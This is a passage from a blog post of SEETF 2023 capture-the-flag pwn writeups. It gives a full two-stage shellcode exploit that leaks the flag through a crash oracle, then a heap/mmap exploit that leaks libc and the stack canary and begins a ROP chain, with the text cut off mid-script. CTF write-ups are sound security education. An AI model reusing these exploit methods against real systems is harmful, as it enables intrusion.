<!doctype html><html lang=en-gb><head><meta charset=utf-8><meta http-equiv=content-type content="text/html"><meta name=viewport content="width=device-width,initial-scale=1"><title itemprop=name>SEETF 2023 Pwn Writeups | a rant of my adventures</title>
<meta property="og:title" content="SEETF 2023 Pwn Writeups | a rant of my adventures"><meta name=twitter:title content="SEETF 2023 Pwn Writeups | a rant of my adventures"><meta itemprop=name content="SEETF 2023 Pwn Writeups | a rant of my adventures"><meta name=application-name content="SEETF 2023 Pwn Writeups | a rant of my adventures"><meta property="og:site_name" content="a rant of my adventures"><meta name=description content="brief writeup on pwn challenges from seetf 2023"><meta itemprop=description content="brief writeup on pwn challenges from seetf 2023"><meta property="og:description" content="brief writeup on pwn challenges from seetf 2023"><meta name=twitter:description content="brief writeup on pwn challenges from seetf 2023"><meta property="og:locale" content="en-gb"><meta name=language content="en-gb"><link rel=alternate hreflang=en-gb href=https://archive.elmo.sg/posts/ctfs/2023/seetf2023-pwns/ title=English><meta itemprop=image content="https://archive.elmo.sg/"><meta property="og:image" content="https://archive.elmo.sg/"><meta name=twitter:image content="https://archive.elmo.sg/"><meta name=twitter:image:src content="https://archive.elmo.sg/"><meta property="og:type" content="article"><meta property="og:article:published_time" content=2023-06-12T05:59:12Z><meta property="article:published_time" content=2023-06-12T05:59:12Z><script defer type=application/ld+json>{"@context":"http://schema.org","@type":"Article","headline":"SEETF 2023 Pwn Writeups","author":{"@type":"Person","name":""},"datePublished":"2023-06-12","description":"brief writeup on pwn challenges from seetf 2023","wordCount":1442,"mainEntityOfPage":"True","dateModified":"2023-06-12","image":{"@type":"imageObject","url":""},"publisher":{"@type":"Organization","name":"a rant of my adventures"}}</script><meta name=generator content="Hugo 0.125.4"><link rel=canonical href=https://archive.elmo.sg/posts/ctfs/2023/seetf2023-pwns/><link href=/style.min.5d415e34e927589b6ad5fe83ea6f8006479d2d6c2fa7897ee14c54c5618ba634.css rel=stylesheet><link href=/code-highlight.min.706d31975fec544a864cb7f0d847a73ea55ca1df91bf495fd12a177138d807cf.css rel=stylesheet><link rel=apple-touch-icon sizes=180x180 href=/icons/apple-touch-icon.png><link rel=icon type=image/png sizes=32x32 href=/icons/favicon-32x32.png><link rel=icon type=image/png sizes=16x16 href=/icons/favicon-16x16.png><link rel=mask-icon href=/icons/safari-pinned-tab.svg><link rel="shortcut icon" href=/favicon.ico><link rel=manifest href=https://archive.elmo.sg/site.webmanifest><meta name=msapplication-config content="/browserconfig.xml"><meta name=msapplication-TileColor content="#2d89ef"><meta name=theme-color content="#434648"><link rel=icon type=image/svg+xml href=/icons/favicon.svg></head><body data-theme=dark class=notransition><script src=/js/theme.min.8961c317c5b88b953fe27525839672c9343f1058ab044696ca225656c8ba2ab0.js integrity="sha256-iWHDF8W4i5U/4nUlg5ZyyTQ/EFirBEaWyiJWVsi6KrA="></script><meta http-equiv=cache-control content="max-age=0"><meta http-equiv=cache-control content="no-cache"><meta http-equiv=expires content="0"><meta http-equiv=expires content="Tue, 01 Jan 1980 1:00:00 GMT"><meta http-equiv=pragma content="no-cache"><div class=navbar role=navigation><nav class=menu aria-label="Main Navigation"><a href=https://archive.elmo.sg/ class=logo><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" viewBox="0 0 24 24" fill="none" stroke="currentcolor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="feather feather-home"><title>Home</title><path d="M3 9l9-7 9 7v11a2 2 0 01-2 2H5a2 2 0 01-2-2z"/><polyline points="9 22 9 12 15 12 15 22"/></svg>
</a><input type=checkbox id=menu-trigger class=menu-trigger>
<label for=menu-trigger><span class=menu-icon><svg xmlns="http://www.w3.org/2000/svg" width="25" height="25" stroke="currentcolor" fill="none" viewBox="0 0 14 14"><title>Menu</title><path stroke-linecap="round" stroke-linejoin="round" d="M10.595 7H3.40726"/><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 3.51488H3.49301"/><path stroke-linecap="round" stroke-linejoin="round" d="M10.5096 10.4851H3.49301"/><path stroke-linecap="round" stroke-linejoin="round" d="M.5 12.5V1.5c0-.552285.447715-1 1-1h11C13.0523.5 13.5.947715 13.5 1.5v11C13.5 13.0523 13.0523 13.5 12.5 13.5H1.5C.947715 13.5.5 13.0523.5 12.5z"/></svg></span></label><div class=trigger><ul class=trigger-container><li><a class=menu-link href=/>Home</a></li><li><a class="menu-link active" href=/posts/>Posts</a></li><li><a class=menu-link href=/pwn/>Pwn</a></li><li><a class=menu-link href=/pages/about/>About</a></li><li class=menu-separator><span></span></li></ul><a id=mode href=#><svg xmlns="http://www.w3.org/2000/svg" class="mode-sunny" width="21" height="21" viewBox="0 0 14 14" stroke-width="1"><title>LIGHT</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1=".5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1=".5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/></g></svg><svg xmlns="http://www.w3.org/2000/svg" class="mode-moon" width="21" height="21" viewBox="0 0 14 14" stroke-width="1"><title>DARK</title><g><circle cx="7" cy="7" r="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1=".5" x2="7" y2="2.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="2.4" x2="3.82" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1=".5" y1="7" x2="2.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="2.4" y1="11.6" x2="3.82" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="7" y1="13.5" x2="7" y2="11.5" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="11.6" x2="10.18" y2="10.18" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="13.5" y1="7" x2="11.5" y2="7" fill="none" stroke-linecap="round" stroke-linejoin="round"/><line x1="11.6" y1="2.4" x2="10.18" y2="3.82" fill="none" stroke-linecap="round" stroke-linejoin="round"/></g></svg></a></div></nav></div><div class="wrapper post"><main class=page-content aria-label=Content><article><header class=header><h1 class=header-title>SEETF 2023 Pwn Writeups</h1><div class=post-meta><time datetime=2023-06-12T05:59:12+00:00 itemprop=datePublished>12 Jun 2023</time></div></header><details class=toc open><summary><b>Table of Contents</b></summary><nav id=TableOfContents><ul><li><a href=#shellcode-as-a-service>Shellcode As A Service</a></li><li><a href=#mmap-note>MMap Note</a></li><li><a href=#great-expectations>Great Expectations</a></li><li><a href=#babysheep>BabySheep</a></li><li><a href=#cstutorial>CSTutorial</a></li></ul></nav></details><div class=page-content><h1 id=seetf-brief-writeup-on-pwns>SEETF Brief Writeup on Pwns</h1><h2 id=shellcode-as-a-service>Shellcode As A Service</h2><p>As indicated by the challenge name and description, we have to write shellcode that will be executed by the program.</p><p>We are given an initial write of 6 bytes long, which allows us to get a second stage write. There is <strong>open, read</strong> seccomp, preventing us from printing flag.</p><p>We can write a loop in assembly to read one character at a time, and terminate if the character is incorrect.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>context</span><span class=o>.</span><span class=n>terminal</span> <span class=o>=</span> <span class=p>[</span><span class=s2>&#34;tmux&#34;</span><span class=p>,</span> <span class=s2>&#34;neww&#34;</span><span class=p>]</span>
</span></span><span class=line><span class=cl><span class=n>context</span><span class=o>.</span><span class=n>binary</span> <span class=o>=</span> <span class=n>ELF</span><span class=p>(</span><span class=s2>&#34;./chall&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># first stage</span>
</span></span><span class=line><span class=cl><span class=n>sc1</span> <span class=o>=</span> <span class=n>asm</span><span class=p>(</span><span class=s2>&#34;&#34;&#34;
</span></span></span><span class=line><span class=cl><span class=s2>mov esi, edx
</span></span></span><span class=line><span class=cl><span class=s2>xor edi, edi
</span></span></span><span class=line><span class=cl><span class=s2>syscall
</span></span></span><span class=line><span class=cl><span class=s2>&#34;&#34;&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=c1># second stage</span>
</span></span><span class=line><span class=cl><span class=n>sc2</span> <span class=o>=</span> <span class=sa>b</span><span class=s2>&#34;</span><span class=se>\x90</span><span class=s2>&#34;</span> <span class=o>*</span> <span class=nb>len</span><span class=p>(</span><span class=n>sc1</span><span class=p>)</span> <span class=o>+</span> <span class=n>asm</span><span class=p>(</span><span class=s2>&#34;&#34;&#34;
</span></span></span><span class=line><span class=cl><span class=s2>mov rbx, 0x67616c662f
</span></span></span><span class=line><span class=cl><span class=s2>push rbx
</span></span></span><span class=line><span class=cl><span class=s2>mov rdi, rsp
</span></span></span><span class=line><span class=cl><span class=s2>mov rsi, 0
</span></span></span><span class=line><span class=cl><span class=s2>mov rdx, 0
</span></span></span><span class=line><span class=cl><span class=s2>mov rax, 0x2
</span></span></span><span class=line><span class=cl><span class=s2>syscall
</span></span></span><span class=line><span class=cl><span class=s2>
</span></span></span><span class=line><span class=cl><span class=s2>mov rdi, rax
</span></span></span><span class=line><span class=cl><span class=s2>mov rsi, 0x1337500
</span></span></span><span class=line><span class=cl><span class=s2>mov rdx, 0x100
</span></span></span><span class=line><span class=cl><span class=s2>mov rax, 0
</span></span></span><span class=line><span class=cl><span class=s2>syscall
</span></span></span><span class=line><span class=cl><span class=s2>
</span></span></span><span class=line><span class=cl><span class=s2>xor r8, r8
</span></span></span><span class=line><span class=cl><span class=s2>jmp loop2
</span></span></span><span class=line><span class=cl><span class=s2>
</span></span></span><span class=line><span class=cl><span class=s2>loop:
</span></span></span><span class=line><span class=cl><span class=s2>inc r8
</span></span></span><span class=line><span class=cl><span class=s2>
</span></span></span><span class=line><span class=cl><span class=s2>loop2:
</span></span></span><span class=line><span class=cl><span class=s2>mov rax, 0
</span></span></span><span class=line><span class=cl><span class=s2>mov rdi, 0
</span></span></span><span class=line><span class=cl><span class=s2>mov rsi, 0x1337900
</span></span></span><span class=line><span class=cl><span class=s2>add rsi, r8
</span></span></span><span class=line><span class=cl><span class=s2>mov rdx, 0x2
</span></span></span><span class=line><span class=cl><span class=s2>syscall
</span></span></span><span class=line><span class=cl><span class=s2>
</span></span></span><span class=line><span class=cl><span class=s2>mov al, [0x1337900+r8]
</span></span></span><span class=line><span class=cl><span class=s2>mov bl, [0x1337500+r8]
</span></span></span><span class=line><span class=cl><span class=s2>cmp al, bl
</span></span></span><span class=line><span class=cl><span class=s2>je loop
</span></span></span><span class=line><span class=cl><span class=s2>
</span></span></span><span class=line><span class=cl><span class=s2>crash:
</span></span></span><span class=line><span class=cl><span class=s2>xor rax, rax
</span></span></span><span class=line><span class=cl><span class=s2>mov byte [rax], al
</span></span></span><span class=line><span class=cl><span class=s2>&#34;&#34;&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>charset</span> <span class=o>=</span> <span class=s2>&#34;</span><span class=si>{_}</span><span class=s2>abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789@$&#34;</span>
</span></span><span class=line><span class=cl><span class=n>ptr</span> <span class=o>=</span> <span class=o>-</span><span class=mi>1</span>
</span></span><span class=line><span class=cl><span class=n>known</span> <span class=o>=</span> <span class=s2>&#34;SEE</span><span class=si>{n1c3_sh3llc0ding_d6e25f87c7ebeef6e80df23d32c42d00}</span><span class=s2>&#34;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>with</span> <span class=n>log</span><span class=o>.</span><span class=n>progress</span><span class=p>(</span><span class=s2>&#34;enumerating&#34;</span><span class=p>)</span> <span class=k>as</span> <span class=n>pro</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=k>while</span> <span class=n>known</span><span class=p>[</span><span class=o>-</span><span class=mi>1</span><span class=p>]</span> <span class=o>!=</span> <span class=s2>&#34;}&#34;</span><span class=p>:</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=n>ptr</span> <span class=o>+=</span> <span class=mi>1</span>
</span></span><span class=line><span class=cl>        <span class=k>if</span> <span class=n>ptr</span> <span class=o>==</span> <span class=nb>len</span><span class=p>(</span><span class=n>charset</span><span class=p>):</span>
</span></span><span class=line><span class=cl>            <span class=n>ptr</span> <span class=o>=</span> <span class=mi>0</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=k>with</span> <span class=n>context</span><span class=o>.</span><span class=n>quiet</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span> <span class=o>=</span> <span class=n>remote</span><span class=p>(</span><span class=s2>&#34;win.the.seetf.sg&#34;</span><span class=p>,</span> <span class=mi>2002</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=n>p</span><span class=o>.</span><span class=n>send</span><span class=p>(</span><span class=n>sc1</span><span class=p>)</span>
</span></span><span class=line><span class=cl>        <span class=n>sleep</span><span class=p>(</span><span class=mf>0.05</span><span class=p>)</span>
</span></span><span class=line><span class=cl>        <span class=n>p</span><span class=o>.</span><span class=n>send</span><span class=p>(</span><span class=n>sc2</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=k>for</span> <span class=n>i</span> <span class=ow>in</span> <span class=n>known</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=n>i</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=n>p</span><span class=o>.</span><span class=n>clean</span><span class=p>()</span>
</span></span><span class=line><span class=cl>        <span class=n>p</span><span class=o>.</span><span class=n>sendline</span><span class=p>(</span><span class=n>charset</span><span class=p>[</span><span class=n>ptr</span><span class=p>]</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>        <span class=n>pro</span><span class=o>.</span><span class=n>status</span><span class=p>(</span><span class=n>known</span> <span class=o>+</span> <span class=n>charset</span><span class=p>[</span><span class=n>ptr</span><span class=p>])</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl>        <span class=k>try</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>recv</span><span class=p>(</span><span class=n>timeout</span><span class=o>=</span><span class=mf>0.05</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>recv</span><span class=p>(</span><span class=n>timeout</span><span class=o>=</span><span class=mf>0.05</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>recv</span><span class=p>(</span><span class=n>timeout</span><span class=o>=</span><span class=mf>0.05</span><span class=p>)</span>
</span></span><span class=line><span class=cl>            <span class=n>known</span> <span class=o>+=</span> <span class=n>charset</span><span class=p>[</span><span class=n>ptr</span><span class=p>]</span>
</span></span><span class=line><span class=cl>        <span class=k>except</span> <span class=ne>EOFError</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=k>pass</span>
</span></span><span class=line><span class=cl>        <span class=k>with</span> <span class=n>context</span><span class=o>.</span><span class=n>quiet</span><span class=p>:</span>
</span></span><span class=line><span class=cl>            <span class=n>p</span><span class=o>.</span><span class=n>close</span><span class=p>()</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>log</span><span class=o>.</span><span class=n>success</span><span class=p>(</span><span class=n>known</span><span class=p>)</span>
</span></span></code></pre></div><h2 id=mmap-note>MMap Note</h2><p>We can allocate some chunks of size 0x1000.</p><p>If we allocate sufficient chunks, we will expend our heap memory and cause our chunk to be mmaped. This allows us to get a chunk that is placed at a constant offset to our libc in memory.</p><p>If you analyze the code that writes to the chunk</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-c data-lang=c><span class=line><span class=cl><span class=kr>__int64</span> <span class=nf>write_0</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=p>{</span>
</span></span><span class=line><span class=cl>  <span class=kt>unsigned</span> <span class=kt>int</span> <span class=n>v1</span><span class=p>;</span> <span class=c1>// [rsp+4h] [rbp-Ch] BYREF
</span></span></span><span class=line><span class=cl><span class=c1></span>  <span class=kt>unsigned</span> <span class=kr>__int64</span> <span class=n>v2</span><span class=p>;</span> <span class=c1>// [rsp+8h] [rbp-8h]
</span></span></span><span class=line><span class=cl><span class=c1></span>
</span></span><span class=line><span class=cl>  <span class=n>v2</span> <span class=o>=</span> <span class=nf>__readfsqword</span><span class=p>(</span><span class=mh>0x28u</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=n>v1</span> <span class=o>=</span> <span class=mi>0</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=nf>printf</span><span class=p>(</span><span class=s>&#34;idx = &#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=nf>__isoc99_scanf</span><span class=p>(</span><span class=s>&#34;%d&#34;</span><span class=p>,</span> <span class=o>&amp;</span><span class=n>v1</span><span class=p>);</span>
</span></span><span class=line><span class=cl>  <span class=k>if</span> <span class=p>(</span> <span class=n>v1</span> <span class=o>&lt;</span> <span class=n>dword_404590</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>  <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=nf>printf</span><span class=p>(</span><span class=s>&#34;size to write = &#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=nf>__isoc99_scanf</span><span class=p>(</span><span class=s>&#34;%d&#34;</span><span class=p>,</span> <span class=o>&amp;</span><span class=n>sizes</span><span class=p>[</span><span class=n>v1</span><span class=p>]);</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=p>(</span> <span class=n>sizes</span><span class=p>[</span><span class=n>v1</span><span class=p>]</span> <span class=o>&lt;=</span> <span class=mi>4096</span> <span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=p>{</span>
</span></span><span class=line><span class=cl>      <span class=nf>read</span><span class=p>(</span><span class=mi>0</span><span class=p>,</span> <span class=p>(</span><span class=kt>void</span> <span class=o>*</span><span class=p>)</span><span class=n>chunk</span><span class=p>[</span><span class=n>v1</span><span class=p>],</span> <span class=n>sizes</span><span class=p>[</span><span class=n>v1</span><span class=p>]);</span>
</span></span><span class=line><span class=cl>      <span class=k>return</span> <span class=mi>1LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl>    <span class=k>else</span>
</span></span><span class=line><span class=cl>    <span class=p>{</span>
</span></span><span class=line><span class=cl>      <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;too much&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>      <span class=k>return</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl>    <span class=p>}</span>
</span></span><span class=line><span class=cl>  <span class=p>}</span>
</span></span><span class=line><span class=cl>  <span class=k>else</span>
</span></span><span class=line><span class=cl>  <span class=p>{</span>
</span></span><span class=line><span class=cl>    <span class=nf>puts</span><span class=p>(</span><span class=s>&#34;invalid idx&#34;</span><span class=p>);</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=mi>0LL</span><span class=p>;</span>
</span></span><span class=line><span class=cl>  <span class=p>}</span>
</span></span><span class=line><span class=cl><span class=p>}</span>
</span></span></code></pre></div><p>We are allowed to read a size that is larger than 0x1000 into the global <strong>sizes</strong> array.</p><p>By using the output option, we can print more than 0x1000 bytes from our memory. This also allows us to leak the canary from the <strong>Thread Local Storage (TLS)</strong> which is stored on the same memory page.</p><p>Subsequently, we can use our buffer overflow in the main function <code>read(0, buf, 0x640uLL);</code> to write a <code>open -> mmap -> write</code> rop chain that maps the flag file to memory and write it to stdout.</p><div class=highlight><pre tabindex=0 class=chroma><code class=language-python data-lang=python><span class=line><span class=cl><span class=kn>from</span> <span class=nn>pwn</span> <span class=kn>import</span> <span class=o>*</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>idx</span> <span class=o>=</span> <span class=o>-</span><span class=mi>1</span><span class=p>;</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>create</span><span class=p>():</span>
</span></span><span class=line><span class=cl>    <span class=k>global</span> <span class=n>idx</span>
</span></span><span class=line><span class=cl>    <span class=n>idx</span> <span class=o>+=</span> <span class=mi>1</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;&gt; &#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;1&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;is &#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>addr</span> <span class=o>=</span> <span class=nb>int</span><span class=p>(</span><span class=n>p</span><span class=o>.</span><span class=n>recvline</span><span class=p>(),</span> <span class=mi>16</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=nb>print</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;</span><span class=si>{</span><span class=n>idx</span><span class=si>}</span><span class=s2> - </span><span class=si>{</span><span class=nb>hex</span><span class=p>(</span><span class=n>addr</span><span class=p>)</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>idx</span><span class=p>,</span> <span class=n>addr</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>write</span><span class=p>(</span><span class=n>idx</span><span class=p>,</span> <span class=n>size</span><span class=p>,</span> <span class=n>data</span><span class=o>=</span><span class=kc>None</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;&gt; &#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;2&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;idx = &#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>idx</span><span class=p>)</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;write = &#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>size</span><span class=p>)</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=n>size</span> <span class=o>&lt;</span> <span class=mh>0x1000</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=n>p</span><span class=o>.</span><span class=n>send</span><span class=p>(</span><span class=n>data</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>def</span> <span class=nf>read</span><span class=p>(</span><span class=n>idx</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;&gt; &#34;</span><span class=p>,</span> <span class=sa>b</span><span class=s2>&#34;3&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>    <span class=n>p</span><span class=o>.</span><span class=n>sendlineafter</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;idx = &#34;</span><span class=p>,</span> <span class=nb>str</span><span class=p>(</span><span class=n>idx</span><span class=p>)</span><span class=o>.</span><span class=n>encode</span><span class=p>())</span>
</span></span><span class=line><span class=cl>    <span class=k>return</span> <span class=n>p</span><span class=o>.</span><span class=n>recvuntil</span><span class=p>(</span><span class=sa>b</span><span class=s2>&#34;1. create note&#34;</span><span class=p>,</span> <span class=n>drop</span><span class=o>=</span><span class=kc>True</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>context</span><span class=o>.</span><span class=n>binary</span> <span class=o>=</span> <span class=n>libc</span> <span class=o>=</span> <span class=n>ELF</span><span class=p>(</span><span class=s2>&#34;/lib/x86_64-linux-gnu/libc.so.6&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>p</span> <span class=o>=</span> <span class=n>remote</span><span class=p>(</span><span class=s2>&#34;win.the.seetf.sg&#34;</span><span class=p>,</span> <span class=mi>2000</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=c1># p = remote(&#34;localhost&#34;, 1338)</span>
</span></span><span class=line><span class=cl><span class=c1># p = process(&#34;./chall&#34;)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=k>for</span> <span class=n>i</span> <span class=ow>in</span> <span class=nb>range</span><span class=p>(</span><span class=mi>2</span><span class=p>):</span>
</span></span><span class=line><span class=cl>    <span class=n>create</span><span class=p>()</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>prev</span> <span class=o>=</span> <span class=n>create</span><span class=p>()[</span><span class=mi>1</span><span class=p>]</span>
</span></span><span class=line><span class=cl><span class=k>while</span> <span class=kc>True</span><span class=p>:</span>
</span></span><span class=line><span class=cl>    <span class=nb>id</span><span class=p>,</span> <span class=nb>next</span> <span class=o>=</span> <span class=n>create</span><span class=p>()</span>
</span></span><span class=line><span class=cl>    <span class=k>if</span> <span class=n>prev</span><span class=o>-</span><span class=nb>next</span> <span class=o>&gt;</span> <span class=mh>0x1000</span><span class=p>:</span>
</span></span><span class=line><span class=cl>        <span class=k>break</span>
</span></span><span class=line><span class=cl>    <span class=n>prev</span> <span class=o>=</span> <span class=nb>next</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>chunk</span> <span class=o>=</span> <span class=nb>next</span>
</span></span><span class=line><span class=cl><span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>=</span> <span class=n>chunk</span><span class=o>+</span><span class=mi>16384</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>log</span><span class=o>.</span><span class=n>info</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;chunk of </span><span class=si>{</span><span class=nb>id</span><span class=si>}</span><span class=s2> at </span><span class=si>{</span><span class=nb>hex</span><span class=p>(</span><span class=n>chunk</span><span class=p>)</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>log</span><span class=o>.</span><span class=n>info</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;libc base @ </span><span class=si>{</span><span class=nb>hex</span><span class=p>(</span><span class=n>libc</span><span class=o>.</span><span class=n>address</span><span class=p>)</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>write</span><span class=p>(</span><span class=nb>id</span><span class=p>,</span> <span class=mi>6000</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>leak</span> <span class=o>=</span> <span class=n>read</span><span class=p>(</span><span class=nb>id</span><span class=p>)</span>
</span></span><span class=line><span class=cl><span class=n>canary</span> <span class=o>=</span> <span class=n>u64</span><span class=p>(</span><span class=n>leak</span><span class=p>[</span><span class=o>-</span><span class=mi>8</span><span class=p>:])</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>log</span><span class=o>.</span><span class=n>info</span><span class=p>(</span><span class=sa>f</span><span class=s2>&#34;canary at </span><span class=si>{</span><span class=nb>hex</span><span class=p>(</span><span class=n>canary</span><span class=p>)</span><span class=si>}</span><span class=s2>&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>fid</span><span class=p>,</span> <span class=n>flag_addr</span> <span class=o>=</span> <span class=n>create</span><span class=p>()</span>
</span></span><span class=line><span class=cl><span class=n>write</span><span class=p>(</span><span class=n>fid</span><span class=p>,</span> <span class=mh>0x5</span><span class=p>,</span> <span class=s2>&#34;/flag&#34;</span><span class=p>)</span>
</span></span><span class=line><span class=cl>
</span></span><span class=line><span class=cl><span class=n>pop_rax</span> <span class=o>=</span> <span class=n>libc</span><span class=o>.</span><span class=n>address</span> <span class=o>+</span> <span class=mh>0x45eb0</span>
